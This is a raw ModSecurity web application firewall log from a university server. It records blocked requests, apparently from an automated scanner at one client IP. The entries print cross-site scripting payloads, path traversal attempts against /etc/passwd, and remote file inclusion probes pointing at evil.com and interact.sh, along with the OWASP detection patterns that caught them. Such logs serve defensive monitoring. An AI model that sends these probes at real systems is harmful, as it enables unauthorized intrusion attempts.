"repositoryfeb.unla.ac.id"] [uri "/webapp/"] [unique_id "ZO16PcCo-f0AAApXgpMAAAAU"]
[Tue Aug 29 11:55:25.943498 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:language: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/webmail/"] [unique_id "ZO16PcCo-f0AAAolKokAAAAe"]
[Tue Aug 29 11:55:26.617329 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:q: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/search/"] [unique_id "ZO16PsCo-f0AAApXgpcAAAAU"]
[Tue Aug 29 11:55:28.567257 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:type: ../../../../../../../../../../../etc/./passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/horde/util/barcode.php"] [unique_id "ZO16QMCo-f0AAAqSwtwAAAAN"]
[Tue Aug 29 11:55:29.894845 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:layout: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/badging/badge_template_v0.php"] [unique_id "ZO16QcCo-f0AAApXgrMAAAAU"]
[Tue Aug 29 11:55:30.541686 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php"] [unique_id "ZO16QsCo-f0AAAqeFXwAAAAx"]
[Tue Aug 29 11:55:30.728536 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16QsCo-f0AAAqY6E8AAAAr"]
[Tue Aug 29 11:55:31.635683 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://evil.com found within TX:1: evil.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/html/common/forward_js.jsp"] [unique_id "ZO16Q8Co-f0AAApHRhgAAAAP"]
[Tue Aug 29 11:55:32.612201 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:login-error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:login-error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16RMCo-f0AAAqY6FoAAAAr"]
[Tue Aug 29 11:55:33.885262 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:query: <script>alert(document.domain);</script>=or"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/pmb/admin/convert/export_z3950.php"] [unique_id "ZO16RcCo-f0AAApHRicAAAAP"]
[Tue Aug 29 11:55:35.831599 2023] [:error] [pid 2742] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:key: <img src onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/vendor/curl/curl/tests/server/php-curl-test/post_file_path_upload.php"] [unique_id "ZO16R8Co-f0AAAq2KdsAAAAE"]
[Tue Aug 29 11:55:36.221405 2023] [:error] [pid 2744] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:include_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:include_file: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16SMCo-f0AAAq4fUsAAAAJ"]
[Tue Aug 29 11:55:36.534951 2023] [:error] [pid 2744] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16SMCo-f0AAAq4fU4AAAAJ"]
[Tue Aug 29 11:55:37.965090 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/labkey/__r1/login-login.view"] [unique_id "ZO16ScCo-f0AAAqTvvIAAAAa"]
[Tue Aug 29 11:55:38.041620 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;// found within ARGS:prod: ';prompt`document.domain`;//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/gsearch.php.en"] [unique_id "ZO16SsCo-f0AAApHRjwAAAAP"]
[Tue Aug 29 11:55:38.678902 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:q: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16SsCo-f0AAAqSwwoAAAAN"]
[Tue Aug 29 11:55:39.696847 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:subpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:subpage: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/WebMstr7/servlet/mstrWeb"] [unique_id "ZO16S8Co-f0AAAolKt0AAAAe"]
[Tue Aug 29 11:55:40.038944 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at REQUEST_COOKIES:svpnlang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within REQUEST_COOKIES:svpnlang: <script>alert('document.domain')</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wnm/login/login.json"] [unique_id "ZO16TMCo-f0AAApHRkUAAAAP"]
[Tue Aug 29 11:55:41.967350 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:link_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:link_url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/Ajax_url_encode.php"] [unique_id "ZO16TcCo-f0AAAqSwycAAAAN"]
[Tue Aug 29 11:55:43.709275 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:port. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:port: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/fw/syslogViewer.do"] [unique_id "ZO16T8Co-f0AAAqY6HAAAAAr"]
[Tue Aug 29 11:55:43.994729 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:keyword: \\x22><script>alert(1337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/sell-media-search/"] [unique_id "ZO16T8Co-f0AAAqqtigAAAAA"]
[Tue Aug 29 11:55:44.648725 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:nodatamsg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:nodatamsg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html"] [unique_id "ZO16UMCo-f0AAAqSwzYAAAAN"]
[Tue Aug 29 11:55:44.669195 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:cid: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/component/music/album.html"] [unique_id "ZO16UMCo-f0AAAolKv0AAAAe"]
[Tue Aug 29 11:55:45.617398 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/redirector.php"] [unique_id "ZO16UcCo-f0AAAolKwAAAAAe"]
[Tue Aug 29 11:55:46.601018 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16UsCo-f0AAAqTvx4AAAAa"]
[Tue Aug 29 11:55:46.640869 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:<script>alert(35587703)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:<script>alert(35587703)</script>: <script>alert(35587703)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/printenv.shtml"] [unique_id "ZO16UsCo-f0AAAq5@FgAAAAK"]
[Tue Aug 29 11:55:46.751824 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/redirector.php"] [unique_id "ZO16UsCo-f0AAAqTvyMAAAAa"]
[Tue Aug 29 11:55:46.775385 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:login[password]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:login[password]: test\\x22><svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/appliance/login.ns"] [unique_id "ZO16UsCo-f0AAAq5@F0AAAAK"]
[Tue Aug 29 11:55:47.567827 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/shib_logout.php"] [unique_id "ZO16U8Co-f0AAAq@sZwAAAAM"]
[Tue Aug 29 11:55:48.585124 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:<script>alert(35587703)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:<script>alert(35587703)</script>: <script>alert(35587703)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/ssi/printenv.shtml"] [unique_id "ZO16VMCo-f0AAApbUo4AAAAh"]
